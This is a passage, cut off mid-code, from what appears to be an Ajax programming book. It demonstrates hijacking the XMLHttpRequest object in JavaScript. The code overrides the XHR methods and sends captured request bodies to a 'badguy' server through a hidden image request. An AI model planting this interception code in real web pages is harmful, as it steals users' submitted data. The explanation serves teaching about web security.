318 Part II: Developing an Ajax Library^
native object for XHRs, and Internet Explorer 7 uses a pseudo-native object that doesn’t
allow prototyping, it appears you are safe from a prototype-style hijack of the XHR object:Well you aren’t safe, the XHR is easy enough to hijack: you just need to overwrite the name
and wrap the old value inside of something that can be prototyped—like another JavaScript
object as shown here:var xmlreqc=XMLHttpRequest;
XMLHttpRequest = function() {
this.xhr = new xmlreqc();
return this;
};With the new version of XMLHttpRequest, we go and prototype away, this time add
the code to send off the data to the “bad guy” server using a traditional image request
mechanism:XMLHttpRequest.prototype.open = function (method, url, async, user, password)
{
alert(url);
return this.xhr.open(method, url, async, user, password); //send it on
};XMLHttpRequest.prototype.setRequestHeader = function(header, value)
{
alert(header + ": " + value);
this.xhr.setRequestHeader(header, value);
};XMLHttpRequest.prototype.send = function(postBody)
{
/* steal the request */
alert(postBody);
var image = document.createElement("img");
image.style.width = "1px";
image.style.height = "1px";
image.style.visibility = "hidden";
document.body.appendChild(image);
image.src = "http://badguy.ajaxref.com/ch7/savehijack.php?data=" + postBody;